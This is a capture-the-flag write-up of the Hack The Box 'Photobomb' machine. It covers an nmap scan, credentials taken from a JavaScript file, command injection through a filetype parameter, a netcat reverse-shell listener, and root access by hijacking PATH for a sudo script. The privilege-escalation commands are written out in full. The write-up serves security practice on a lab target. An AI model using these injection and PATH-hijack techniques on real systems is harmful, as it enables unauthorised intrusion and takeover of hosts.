Hackthebox Photobomb Writeup


Dedsec / October 10, 2022

4 min read––– views


Hackthebox released a new machine called photobomb. On this machine, we got the web server where there is a JS file where we get the username and password to access the protected route, then abuse the filetype parameter to get a rev shell as photobomb and for Privilege Escalation using path traverse to get a root shell.


❯ nmap -sC -sV -oA nmap/result
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-10 15:17 IST
Nmap scan report for
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds

Nmap tell us there are two open ports 22 ssh and 80 http and HTTP port redirect us to http://photobomb.htb/

Let's quickly add this in our /etc/hosts file

❯ cat /etc/hosts       localhost examzy.com broadcasthost
::1             localhost    photobomb.htb


There is a simple HTML page with a link which going to /printer but it's asking for password that's we don't know



After that, I view the source code of the website that's include the JS file called photobomb.js


Viewing that file, we got the username and password


Now let's try to log in with that username and password

username = pH0t0
password = b0Mb!

After login, we see that there is an option to download photo to print


I capture that request in burp and try some command injection in all parameters

I try the payload in all parameter because I don't know in which parameter there will be command injection

But before that start your python web server

> python3 -m http.server 80


This conforms that photo and dimensions parameter is not vulnerable


Command Injection

Let's try with file type parameter



And we got the hit, it's mean we can get rev shell with that



I try bash payload, but that didn't work, so let's try python one


Before that, start your net cat listener

> nc -nvlp 9001

It's hanging that good sign, let's check the net cat


Boom 🎉 we got the shell as wizard user


Got the user.txt

wizard@photobomb:~/photobomb$ cd ~
cd ~
wizard@photobomb:~$ cat user.txt
cat user.txt

Privilege Escalation

Before running linpeas let's try with sudo -l

And we can see there is cleanup.sh script which we can run with sudo privilege

wizard@photobomb:~$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

And the content of the script is straight forward, it's just taking the log file and move their content into photobomb.log.old and then use truncate to clear photobomb.log to 0 byte

but if you see clearly it's not using absolute path like cd, find we can take advantage of that and traverse the path of that binaries

wizard@photobomb:~$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Just add /bin/bash in cd file and give read, write, execute permission

I also create find file because if one failed we have backup to get shell as root

Now just run that file with sudo permission and set the PATH to /temp directory

wizard@photobomb:~$ echo "/bin/bash" > /tmp/cd
echo "/bin/bash" > /tmp/cd
wizard@photobomb:~$ echo "/bin/bash" > /tmp/find
echo "/bin/bash" > /tmp/find
wizard@photobomb:~$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt

Subscribe to the newsletter

Get emails from me about hacking news, tech, and early notification of new writeups.

- subscribers – View all issues